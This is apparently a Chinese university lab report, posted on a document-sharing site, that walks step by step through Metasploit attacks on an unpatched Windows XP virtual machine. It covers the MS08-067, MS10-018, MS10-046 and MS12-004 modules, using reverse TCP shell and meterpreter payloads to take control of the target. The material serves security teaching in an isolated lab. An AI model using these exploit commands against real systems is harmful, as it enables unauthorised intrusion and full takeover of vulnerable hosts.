计算机系统安全 实验二metasploit.docx

上传人:b****4 文档编号:3715777 上传时间:2023-05-06 格式:DOCX 页数:21 大小:8.01MB
下载 相关 举报
计算机系统安全 实验二metasploit.docx_第1页
第1页 / 共21页
计算机系统安全 实验二metasploit.docx_第2页
第2页 / 共21页
计算机系统安全 实验二metasploit.docx_第3页
第3页 / 共21页
计算机系统安全 实验二metasploit.docx_第4页
第4页 / 共21页
计算机系统安全 实验二metasploit.docx_第5页
第5页 / 共21页
计算机系统安全 实验二metasploit.docx_第6页
第6页 / 共21页
计算机系统安全 实验二metasploit.docx_第7页
第7页 / 共21页
计算机系统安全 实验二metasploit.docx_第8页
第8页 / 共21页
计算机系统安全 实验二metasploit.docx_第9页
第9页 / 共21页
计算机系统安全 实验二metasploit.docx_第10页
第10页 / 共21页
计算机系统安全 实验二metasploit.docx_第11页
第11页 / 共21页
计算机系统安全 实验二metasploit.docx_第12页
第12页 / 共21页
计算机系统安全 实验二metasploit.docx_第13页
第13页 / 共21页
计算机系统安全 实验二metasploit.docx_第14页
第14页 / 共21页
计算机系统安全 实验二metasploit.docx_第15页
第15页 / 共21页
计算机系统安全 实验二metasploit.docx_第16页
第16页 / 共21页
计算机系统安全 实验二metasploit.docx_第17页
第17页 / 共21页
计算机系统安全 实验二metasploit.docx_第18页
第18页 / 共21页
计算机系统安全 实验二metasploit.docx_第19页
第19页 / 共21页
计算机系统安全 实验二metasploit.docx_第20页
第20页 / 共21页
亲,该文档总共21页,到这儿已超出免费预览范围,如果喜欢就下载吧!
下载资源
资源描述

计算机系统安全 实验二metasploit.docx

《计算机系统安全 实验二metasploit.docx》由会员分享,可在线阅读,更多相关《计算机系统安全 实验二metasploit.docx(21页珍藏版)》请在冰点文库上搜索。

计算机系统安全 实验二metasploit.docx

计算机系统安全实验二metasploit

计算机系统安全实验二:

操作系统安全与metasploit渗透测试

实验目的:

学习计算机操作系统安全相关内容。

学习操作系统渗透相关内容

学习metasploit渗透工具使用。

实验原理:

Windows操作系统安全结构

网络渗透原理

实验环境:

软件:

vmware环境下,

虚拟机,vm-WinXP镜像

虚拟机,backtrack4及backtrack5虚拟机镜像等。

实验拓扑:

被渗透机:

使用虚拟机XP,建议使用未安装更新的英文XP操作系统,,设置其IP地址为,自动获得,虚拟机网络连接方式NAT方式。

实验室计算机network系统下中network_vm目录中有metasploitable_XP,可使用之。

渗透测试机:

使用Bt4或5作为操作系统,

准备工作:

启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:

被渗透机:

操作系统:

____windowsxpwithsp1_________

IP地址:

渗透测试机:

操作系统:

___________bt5_______

IP地址:

注意,若网络连接未启用,请先启用之,linux下可使用ifupeth0)

实验内容:

第一部分:

针对操作系统内部服务端口进行渗透

了解ms08-067漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。

MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。

漏洞对象:

受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有WindowsXP/2000/Vista/2003等。

除WindowsServer2008Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows2000、WindowsXP和WindowsServer2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。

这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。

漏洞端口:

_______445_________________________________________________

步骤一:

启动metasploit控制台msfconsole

记录其

步骤二:

搜索模块ms08-067号模块

searchms08-067

找到模块,记录其名称,级别,描述

步骤三:

使用这个模块

usewindows/smb/ms08_067_netapi

步骤四:

查找有用的payloads

showpayloads

步骤五:

使用其中最常用的一个payload

setpayloadwindows/shell/reverse_tcp

步骤六:

查看当前的这个payload以及攻击所需要的参数选项

showoptions

发现模块所需要选项,有些有默认参数:

RPORT,SMBPIPE

有些没有RHOST

发现payload所需要参数,有些有默认参数:

EXITFUNC,LPORT

有些没有:

LHOST

渗透的目标设置值:

0

步骤七:

设置参数

setRHOST被渗透主机的IP地址

setLHOST 渗透测试主机的IP地址。

步骤八:

showoptions查看当前参数设置是否齐全。

步骤九:

showtargets查看当前攻击的目标。

0若有,则表示可进行自动选择攻击。

其他,则为特定选择特定系统。

步骤十:

参数齐全,目标选定,渗透载荷准备就绪,然后实施。

exploit

渗透开始。

自动创建一shell(命令提示符)

使用ipconfig及dir等命令确定当前控制的计算机是哪台。

打开放大镜:

步骤十一:

Exit然后再exit退出。

第二部分:

针对操作系统下的浏览器进行渗透

步骤一:

浏览器漏洞MS10-018

了解ms10-018漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

在提交数据时InternetExplorer处理使用特制编码字符串的内容的方式存在信息泄露漏洞。

攻击者可以通过创建特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。

成功利用这个漏洞的攻击者可以查看本地计算机或其他域或InternetExplorer区中的其他浏览器窗口的内容。

漏洞对象:

Microsoft__Internet__ExplorerSP4

漏洞端口:

8080

步骤一:

启动metasploit控制台

msfconsole

步骤二:

搜索模块ms10-018号模块

searchms10-018

找到模块,记录其名称,级别,描述

步骤三:

使用这个模块

usewindows/browser/ms10_018_ie_behaviors

步骤四:

查找有用的payloads

showpayloads

步骤五:

使用其中最常用的一个payload

setpayloadwindows/shell/reverse_tcp

步骤六:

查看当前的这个payload以及攻击所需要的参数选项

showoptions

发现模块所需要选项,有些有默认参数:

SRVHOST,SRVPORT,SSL,SSLVersion

有些没有:

URIPATH

发现payload所需要参数,有些有默认参数:

EXITFUNC,LPORT

有些没有:

LHOST

步骤七:

设置SRVHOST和LHOST都设置为渗透测试机IP

setSRVHOSTLHOST

可设置为0

渗透准备

exploit

则列出一URL

如:

usingurl:

暂时渗透到此

(注意其中的qte30235fs为自动产生)

在当对方机器使用时,sessions产生

使用sessions来获知session

sessions-i1

直接将session转到shell中

创建一shell(命令提示符)

使用ipconfig及dir等命令确定当前控制的计算机是哪台

打开写字板:

第三部分:

针对操作系统下类似快捷方式使用进行渗透

步骤一:

浏览器漏洞MS10-046

了解ms10-046漏洞详情:

(请课后上网查询相关内容)

漏洞描述:

Windows支持使用快捷方式或LNK文件。

LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。

Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。

这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。

默认下Windows启动了自动加载和自动播放功能,因此在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。

其他显示文件图标的应用也可用作这个漏洞的攻击载体。

漏洞对象:

MicrosoftWindowsXPSP3

MicrosoftWindowsXPSP2

MicrosoftWindows Vista SP2

MicrosoftWindows Vista SP1

MicrosoftWindowsServer2008

MicrosoftWindowsServer2008SP2

MicrosoftWindowsServer2008R2

MicrosoftWindowsServer2003SP2

MicrosoftWindows7

漏洞端口:

_________80_______________________________________________

步骤一:

启动metasploit控制台msfconsole

步骤二:

搜索模块ms10-046号模块

searchms10-046

找到模块,记录其名称,级别,描述

步骤三:

使用这个模块

usewindows/browser/ms10_046_shortcut_icon_dllloader

步骤四:

查找有用的payloads

showpayloads

步骤五:

使用其中最常用的一个payload

setpayloadwindows/shell/reverse_tcp

步骤六:

查看当前的这个payload以及攻击所需要的参数选项

showoptions

发现模块所需要选项,有些有默认参数:

SRVPORT,SRVHOST,URIPATH

有些没有UNCHOST

发现payload所需要参数,有些有默认参数:

EXITFUNC,LPORT

有些没有:

LHOST

步骤七:

设置SRVHOST和LHOST都设置为渗透测试机IP

setSRVHOSTLHOST

设置浏览的URL

setURIPATH(其中hzs为你的姓名的首字母)

target可设置为0

渗透准备

exploit

报错,说明URIPATH不能改动,需要改回默认值

重新exploit

则列出一URL

如:

usingurl:

暂时渗透到此

在当对方机器使用如:

usingurl:

时,sessions产生

使用sessions来获知session

sessions-i1

直接将session转到shell中

创建一shell(命令提示符)

使用ipconfig及dir等命令确定当前控制的计算机是哪台

打开任务管理器:

使用taskmgr命令

*第四部分:

渗透时使用meterpreter工具。

浏览器漏洞MS12-004

WindowsMediaPlayer是系统的多媒体播放组件。

WMP在处理畸形结构的MIDI数据时存在内存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。

受影响系统:

MicrosoftWindowsXPProfessional

MicrosoftWindowsXPHomeEdition

MicrosoftWindowsVista

MicrosoftWindowsStorageServer2003

MicrosoftWindowsServer2008

MicrosoftWindowsServer2003WebEdition

MicrosoftWindowsServer2003StandardEdition

MicrosoftWindowsServer2003EnterpriseEdition

MicrosoftWindowsServer2003DatacenterEdition

MicrosoftWindows7

启动msfconsole

searchms12_004

搜索不到该模块

得到相关结果为windows/browser/ms12_004_midi

使用它

usewindows/browser/ms12_004_midi

查看payloads

showpayloads

setpayloadwindows/meterpreter/reverse_tcp

查看相关的选项options

showoptions

有SRVHOSTSRVPORTSSL及SSLversion为模块的参数

有EXITFUNC和LHOST及LPORT作为payload的参数。

还有target设置

设置SRVHOST和LHOST都设置为本地IP

setSRVHOSTLHOST可设置为0

setURLPATH

渗透准备

exploit

则列出一URL

如:

using暂时渗透到此

在当对方机器使用时,sessions产生

使用sessions来获知session

sessions-i1

直接将session转到shell中

创建至meterpreter

使用命令查看当前的meterpreter可操作的内容。

试使用相关的进程管理工具对被渗透计算机上的进行管理!

实验心得:

通过实验学习到了如何利用metasploit入侵其他电脑,可以在知道对方ip地址的情况下主动渗透,也可以诱使用户访问恶意网页控制用户系统,由此可见漏洞被不法之徒利用之后会对用户造成巨大的损失,让我意识到学好计算机系统安全这门课的重要性。

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > PPT模板 > 商务科技

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2